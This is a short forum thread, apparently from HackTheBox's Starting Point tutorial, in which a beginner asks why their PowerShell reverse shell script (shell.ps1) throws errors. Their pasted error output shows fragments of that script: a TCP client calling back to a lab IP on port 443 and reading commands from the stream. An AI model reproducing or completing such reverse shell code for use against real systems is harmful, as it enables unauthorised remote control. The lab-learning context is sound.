Starting point:foothold

Hi all,
I’m noobie for hackthebox so please be gentle :slight_smile:

I’m currently working on the start tutorial and got some syntax error on the shell.ps1:

client : The term ‘client’ is not recognized as the name of a cmdlet, function, script file, or operable program.

Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

At line:1 char:1

• client = New-Object System.Net.Sockets.TCPClient(“10.10.14.112”,443);

• 
      + CategoryInfo          : ObjectNotFound: (client:String) [], CommandNotFoundException   

+ FullyQualifiedErrorId : CommandNotFoundException                              

You cannot call a method on a null-valued expression.

At line:2 char:1

• $stream = $client.GetStream();

•                                                                                  
      + CategoryInfo          : InvalidOperation: (:) [], RuntimeException            

+ FullyQualifiedErrorId : InvokeMethodOnNull                                    

At line:4 char:8

• while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){

•    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                               

• CategoryInfo : InvalidOperation: (:slight_smile: , RuntimeException

• FullyQualifiedErrorId : InvokeMethodOnNull

At line:10 char:1

• $client.Close()

• 
      + CategoryInfo          : InvalidOperation: (:) [], RuntimeException           

+ FullyQualifiedErrorId : InvokeMethodOnNull       

The script looks the same as the tutorial (expect the host ip of course), how can I validate the script syntax prior running it?

Thanks in advance.
O.

I have the same issue, no idea what to do